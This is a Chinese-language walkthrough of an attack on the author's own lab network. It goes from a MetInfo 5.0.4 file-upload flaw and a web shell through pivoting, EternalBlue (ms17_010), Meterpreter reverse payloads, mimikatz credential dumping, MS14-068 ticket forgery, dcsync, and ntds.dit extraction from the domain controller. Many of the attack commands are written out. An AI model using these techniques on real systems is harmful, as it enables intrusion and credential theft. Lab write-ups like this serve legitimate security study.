外网渗透

使用御剑扫描目录获取到管理员后台登陆界面。
(此处还有收集whois和ip等信息，由于是自己搭建的靶场就不搜集了)

使用nmap只能扫描到80端口开放。

然后登陆后台管理，尝试弱密码登陆，账号admin和密码admin123登陆成功。


登陆页面之后发现页面有上传文件，尝试直接上传一句话木马php，文件报错，而且有流量经过，说明不是js前端验证。然后尝试修改上传格式，添加了php格式，上传还是不成功。(后来发现是将已有的格式全部删除，即可上传php文件)

然后在到前台界面尝试sql注入，由于页面没有sql语句报错，尝试了布尔值注入，只能拿到数据库名字metinfo。

接下来无法进行下一步，然后再回去查看metinfo的版本，百度查看了该系统版本5.0.4存在的漏洞，找到了文件上传的方法，编写了一个html文件，成功上传一句话木马。



而且在页面执行成功，然后上菜刀，打开了该电脑，尝试上传QuarksPwDump.exe软件到windows\temp目录下，虚拟终端执行了成功获取到hash值，然后cmd5在线翻译了得到密码123.com，在使用ms15-051.exe成功提权。

此处使用的MetInfo版本是5.0.4，漏洞复现详情请观看

使用代理拿下win7

由于win3的是phpstudy，所以将tunnel.nosocket.php文件放到www目录下，然后远程打开，确定能打开之后。



然后使用kali的python环境将代理挂上。

然后使用proxychains nmap扫描对应的端口445是否开放。

然后将使用proxychains msfconsole创建木马连接win7，使用ms17_010连接上win7获取meterpreter，然后执行shell。

发现反弹不了cmd.exe，然后使用msfvenom另外生成一个lida.exe木马，使用meterpreter上传到目标服务器，然后使用在另外开一个msfconsole，使用exploit/multi/hander，设置端口，exploit挂上代理，然后原来的meterpreter使用execute -f lida.exe执行木马即可反弹代理，然后第二个meterpreter即可生成，使用shell成功执行。







原来的meterpreter可以先不用关掉，可以用来上传文件，先是上传mimikatz.exe、mimidrv.sys和mimilib.dll，然后第二个meterpreter获得的shell(系统权限)执行它，然而并没有获取到本机的hash值，我上传Invoke-Mimikatz.ps1，然后在第二个meterpreter返回的shell输入powershell -exec bypass “import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz” 返回了hash值。


在第二关meterpreter输入ps查看进程，知道了hacker的test进程之后，使用migrate+pid(test的任意一个)。

然后getuid查看了解到了身份就变成test身份了，然后whami /all查看test的sid。


然后使用net view查看了域管的计算机名，再使用14068py.exe -u [email protected] -p “123.com” -s SID号 -d 域控计算机名.hacker.com获取[email protected]，然后klist purge清除票据，然后就可以dir \域管计算机名\c$连接上域管了，这里我连获取域hash值一块做了，再输入mimikatz.exe，输入lsadump::dcsync /domain:hacker.com /user:administrator /csv获取域hash值。

关掉第一个meterpreter，第二个shell退出到meterpreter，然后background挂起到后台上，然后route add 10.0.0.0 255.0.0.0 1，然后use auxiliary/server/socks4a，exploit一下，然后netstat -anpt发现本地端口1080开放了，然后修改/etc/proxychains.conf文件最后一行未ssocks4 127.0.0.1 1080，然后就可以使用代理hydra弱口令**sever域管了。

使用sessions -I 1回到了meterpreter，shell进入cmd，使用chcp 65001可以更改编码格式，然后分别使用了at、schtasks和psexec进行计划任务执行，使用at \目标机的ip 时间 command。使用schtasks /run /tn 计划任务名称 /s 目标机ip /u 用户 /p 密码，可以立即执行计划任务，不用等到设定的时间，schtasks /F /delete /tn 计划任务名 /s 目标机ip /u 用户 /p 密码，可以将计划任务删除。


上传写好的1.bat文件和vssown.vbs文件到win7，使用net use远程连接上server，然后dir一下看是否成功，然后在copy复制到server，然后再使用计划任务at执行一下，执行成功后，查看了server多了个1.txt文件，打开看到了磁盘快照名，然后写入第二个bat文件，继续上传到win7，再上传到server，再at远程计划执行，再次查看发现server多了ntds.dit和system文件，然后先是copy到win7，然后在从win7下载到kali，然后使用kali解码。